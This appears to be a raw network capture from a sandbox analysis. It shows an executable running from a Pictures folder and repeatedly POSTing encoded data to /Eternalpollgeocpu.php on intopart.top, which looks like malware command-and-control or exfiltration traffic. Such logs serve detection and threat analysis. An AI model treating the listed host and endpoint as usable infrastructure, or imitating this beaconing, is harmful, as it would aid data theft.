Apr 29, 2024 01:03:47.881795883 CEST	583	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:03:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WEvPxDsSPfGiJouli8eEQxfELs9hJNpZmQkX5X38SjQl%2BB%2BEviQb5voWQnymo2pXmK3NmyA70YBNDPWEM2ZQDiFmBM8AMBgcjSDwpRTF%2FroWjnr37K7Pl5jgt5%2FTcOI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87bab0097d4222c8-ORD alt-svc: h2=":443"; ma=60 Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a Data Ascii: 4<ZYT
Apr 29, 2024 01:03:47.881829977 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.4	49819	172.67.144.153	80	8064	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:03:48.109529018 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue
Apr 29, 2024 01:03:48.219518900 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:03:48.219698906 CEST	1080	OUT	Data Raw: 5d 5f 5a 58 55 5b 5e 51 54 56 50 51 5a 54 51 57 5b 58 5e 45 54 5d 50 47 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: ]_ZXU[^QTVPQZTQW[X^ET]PG]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_'[% !2 _$-=[857$=/=1(=+W$R8\ & Z/!Z/,
Apr 29, 2024 01:03:48.633904934 CEST	589	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:03:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PNmHwfSyCqpg1qCd3cC09LTST1dO%2FR4o9Rr9S%2BAESqJQc7BmRHmL3X37cKlWJxT7hKhTrKObvMN%2FF8Rh8aavN%2B87pI%2FraLaUNh%2FEezWeJyaTOOJifT7V0%2Bq0XghrxMo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87bab00e0b37111b-ORD alt-svc: h2=":443"; ma=60 Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a Data Ascii: 4<ZYT
Apr 29, 2024 01:03:48.633943081 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.4	49820	172.67.144.153	80	8064	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:03:48.395636082 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1788 Expect: 100-continue
Apr 29, 2024 01:03:48.505378008 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:03:48.505609989 CEST	1788	OUT	Data Raw: 58 53 5a 5b 55 5d 5b 53 54 56 50 51 5a 5e 51 52 5b 59 5e 46 54 5f 50 41 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: XSZ[U][STVPQZ^QR[Y^FT_PA]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_'&>0[4(&.:8%'.,)%+?W&3/V/,5#3>_3* Z/!Z/
Apr 29, 2024 01:03:48.779109001 CEST	732	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:03:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Kajpaf7cBFpOMprfBWP0l6uJskDxXsvSzMJ4R5PlRWA68m%2BIMGAed3u6Ab5fDDN0dh58Jvm%2BqvAsT7wbDFIhOPkP1DagdZ6qQiJ%2FahGc%2BW0ue3944947LjAU7I3SGBw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87bab00fdf671160-ORD alt-svc: h2=":443"; ma=60 Data Raw: 39 38 0d 0a 0e 12 20 11 28 05 0f 1e 2a 22 2e 18 27 54 2c 08 25 59 24 43 2a 2f 2a 41 26 1d 3f 07 2c 3e 26 1a 27 27 30 19 20 39 2b 06 26 57 3f 1f 28 1e 20 59 02 1c 39 43 24 2a 22 59 32 10 27 1b 28 0b 29 5c 36 2e 34 11 2a 38 00 52 33 3f 29 5d 3f 20 3d 02 28 00 2c 54 2e 5b 22 07 32 37 2f 52 3f 25 2c 52 08 13 20 10 2b 23 3c 56 22 2b 23 57 25 21 31 07 25 35 24 0b 35 3b 23 0b 2b 39 3c 5f 27 32 08 11 25 22 0c 1e 3a 1d 27 08 23 2c 08 04 30 3d 21 5c 2f 02 20 49 0f 34 5d 53 0d 0a Data Ascii: 98 (".'T,%Y$C/A&?,>&''0 9+&W?( Y9C$"Y2'()\6.4*8R3?)]? =(,T.["27/R?%,R +#<V"+#W%!1%5$5;#+9<_'2%":'#,0=!\/ I4]S
Apr 29, 2024 01:03:48.779149055 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.2.4	49821	172.67.144.153	80	8064	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:03:48.862005949 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue
Apr 29, 2024 01:03:48.973093033 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:03:48.973232031 CEST	1080	OUT	Data Raw: 5d 59 5f 5b 50 59 5b 55 54 56 50 51 5a 55 51 54 5b 52 5e 42 54 53 50 43 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: ]Y_[PY[UTVPQZUQT[R^BTSPC]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_$1=871/&>;%?0)9:+[+P$3<8?-493: Z/!Z/(
Apr 29, 2024 01:03:49.372044086 CEST	581	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:03:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5LRj86LdMQJdIYI84vS%2F95vG3R2hZanAtZzua1comFiDM5Aueg6X0fxx9UHYTNhBL%2FgnwjL%2F87eRGmvCDLxSNbNnsaozLlNO0OuOTGgWhPfsdPgaNS4Ox5uwoULYXEE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87bab012cdbbe14b-ORD alt-svc: h2=":443"; ma=60 Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a Data Ascii: 4<ZYT
Apr 29, 2024 01:03:49.372126102 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
73	192.168.2.4	49822	172.67.144.153	80	8064	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:03:49.611337900 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue
Apr 29, 2024 01:03:49.722054005 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:03:49.723978043 CEST	1080	OUT	Data Raw: 58 59 5a 59 50 5e 5e 52 54 56 50 51 5a 51 51 5a 5b 5f 5e 45 54 5e 50 48 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: XYZYP^^RTVPQZQQZ[_^ET^PH]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_'Y&-84;&>!_; $/>&W+/W$08-?=#0=' Z/!Z/
Apr 29, 2024 01:03:50.139683008 CEST	583	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:03:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lrOHHqZvKQvdIlvIP0g3gIGR0Qa3I87YJBUTeodwfx98RJmXrT%2BGcqYl%2F10h2gsUiabh4kK%2FeKVGhk%2BR6SS7kmDDbLeXHcrbzmglS3XcVIvQpI5nADHsqkUtmhXqVPE%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87bab0177f1922eb-ORD alt-svc: h2=":443"; ma=60 Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a Data Ascii: 4<ZYT
Apr 29, 2024 01:03:50.139746904 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.4	49823	172.67.144.153	80	8064	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:03:50.375750065 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue
Apr 29, 2024 01:03:50.486210108 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:03:50.486435890 CEST	1080	OUT	Data Raw: 58 5d 5a 58 50 5d 5b 51 54 56 50 51 5a 57 51 56 5b 52 5e 46 54 52 50 43 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: X]ZXP][QTVPQZWQV[R^FTRPC]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_$1/42,2X&,0[ Z>%+=0'3;V;<&#:$* Z/!Z/
Apr 29, 2024 01:03:50.784604073 CEST	575	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:03:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6xp49yrsknMJ1Fq4vvsIxWGrb2goE5ie3AdJsQYybDIgepn3otYITScjd8voHE8NRlMJhwmLVEa0A37BCKpDSmN0qkBQXD9LRplZNyrD7c0tdXoshFdoN2ET2d0qP0Q%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87bab01c3e362a99-ORD alt-svc: h2=":443"; ma=60 Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a Data Ascii: 4<ZYT
Apr 29, 2024 01:03:50.784636974 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.2.4	49824	172.67.144.153	80	8064	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:03:51.024851084 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue
Apr 29, 2024 01:03:51.135338068 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:03:51.138650894 CEST	1080	OUT	Data Raw: 58 5b 5a 51 55 56 5e 56 54 56 50 51 5a 50 51 53 5b 5a 5e 41 54 5a 50 48 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: X[ZQUV^VTVPQZPQS[Z^ATZPH]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_$1/7\2;U',^):"W)-#R3;R8/5Y7#*': Z/!Z/<
Apr 29, 2024 01:03:51.422130108 CEST	579	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:03:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=27ixjQWX33PBXaEAT%2BBvsGjdYt2FvKKFBmQQ8ZEaIqjQzEeFAj8nJUMhBMZ%2BaDNYIoh03ZYkh35wL18Kk4dYBa2lESQdFnINYfpWwSUqAPp0hZgZwYRPbKQXup4lVxg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87bab02049a52243-ORD alt-svc: h2=":443"; ma=60 Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a Data Ascii: 4<ZYT
Apr 29, 2024 01:03:51.422162056 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.4	49825	172.67.144.153	80	8064	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:03:51.659262896 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue
Apr 29, 2024 01:03:51.769864082 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:03:51.770147085 CEST	1080	OUT	Data Raw: 58 5c 5a 5d 55 5a 5b 50 54 56 50 51 5a 51 51 52 5b 5d 5e 46 54 59 50 45 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: X\Z]UZ[PTVPQZQQR[]^FTYPE]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_']1#"1-5\, '$[.+[/P&0',5[#36\3 Z/!Z/
Apr 29, 2024 01:03:52.065978050 CEST	584	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:03:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XziakBSnMgS8yZge%2BNAV0FR4eKJDmbEnl2W%2FQ%2BjZvYGOSx%2BJtE7F5%2BfeZx1cVjbzTybgkDFM%2Fezqn%2FVl3wqs7z7yyb%2FOfmDZedrOOyEzrgHoAqQ%2FnHcOigBgRwkSQIU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87bab0243ee729b4-ORD alt-svc: h2=":443"; ma=60
Apr 29, 2024 01:03:52.065999031 CEST	9	IN	Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a Data Ascii: 4<ZYT
Apr 29, 2024 01:03:52.066015005 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
77	192.168.2.4	49826	172.67.144.153	80	8064	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:03:52.325969934 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1076 Expect: 100-continue
Apr 29, 2024 01:03:52.436454058 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:03:52.436634064 CEST	1076	OUT	Data Raw: 58 52 5a 5d 55 57 5b 53 54 56 50 51 5a 56 51 5b 5b 5a 5e 45 54 5d 50 41 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: XRZ]UW[STVPQZVQ[[Z^ET]PA]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_'X'>,#,&>,&4P$?><7'0/;?&7#$* Z/!Z/
Apr 29, 2024 01:03:52.858836889 CEST	583	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:03:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=b2K9fSAZINxSJca07%2FSuAiS%2Fc%2B%2FLEjvFDMYPVMxSRvt5yCf80ieXRuW1gE6m9irlf3f4T9lE0R9fjqtwXBKRbjW2aPM00R1Rrr0YPUTHzU0VeVwMSEasZbSyQDY2znk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87bab0286838acb1-ORD alt-svc: h2=":443"; ma=60 Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a Data Ascii: 4<ZYT
Apr 29, 2024 01:03:52.858860970 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
78	192.168.2.4	49827	172.67.144.153	80	8064	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:03:53.097583055 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue
Apr 29, 2024 01:03:53.208096027 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:03:53.208275080 CEST	1080	OUT	Data Raw: 5d 58 5a 5b 55 56 5b 50 54 56 50 51 5a 53 51 52 5b 53 5e 45 54 5d 50 42 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: ]XZ[UV[PTVPQZSQR[S^ET]PB]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_'\24! 2>5];%0W'0**('W$#3V,/" =$ Z/!Z/0
Apr 29, 2024 01:03:53.608973980 CEST	575	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:03:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IIBi81wOsACC5CPynB8IjBOtClstWGauiYDQuhHbHVFnE1nYPWtOCFLdSsWRdNbhNmcDdgWNFoo7jyDrsXJRC7s9AsTAJmjdFlcAaXDIKi4WONGmSkA7IaWkWv1wyMA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87bab02d3b11225e-ORD alt-svc: h2=":443"; ma=60 Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a Data Ascii: 4<ZYT
Apr 29, 2024 01:03:53.609009027 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
79	192.168.2.4	49828	172.67.144.153	80	8064	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:03:53.850121021 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue
Apr 29, 2024 01:03:53.960185051 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:03:53.960455894 CEST	1080	OUT	Data Raw: 58 5b 5a 51 55 59 5b 53 54 56 50 51 5a 51 51 52 5b 58 5e 43 54 59 50 49 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: X[ZQUY[STVPQZQQR[X^CTYPI]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_'[1$#T0^&.^8,$.$[).V)=&3W,\ :^$ Z/!Z/
Apr 29, 2024 01:03:54.343214989 CEST	585	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:03:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=m5lU5MYIvvg1rZWhpnCHDlz8BjNIma7%2B46qTeInKIX6lzizU0Vlzcj4F6yIc3iQBEql%2B5nhc%2F3qybGHbCA5u%2BFa9yIidzecIwoD1jG%2FmwK55O45Zxm1EJEWu2guRUAk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87bab031e9ac6077-ORD alt-svc: h2=":443"; ma=60 Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a Data Ascii: 4<ZYT
Apr 29, 2024 01:03:54.343231916 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
80	192.168.2.4	49829	172.67.144.153	80	8064	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:03:53.896543026 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1788 Expect: 100-continue
Apr 29, 2024 01:03:54.007102966 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:03:54.007293940 CEST	1788	OUT	Data Raw: 5d 5e 5a 5d 50 5d 5b 52 54 56 50 51 5a 50 51 54 5b 52 5e 44 54 52 50 41 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: ]^Z]P][RTVPQZPQT[R^DTRPA]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_$&>/#!?%=5,5 W&.<_))&T?=$3-?5[4-'* Z/!Z/<
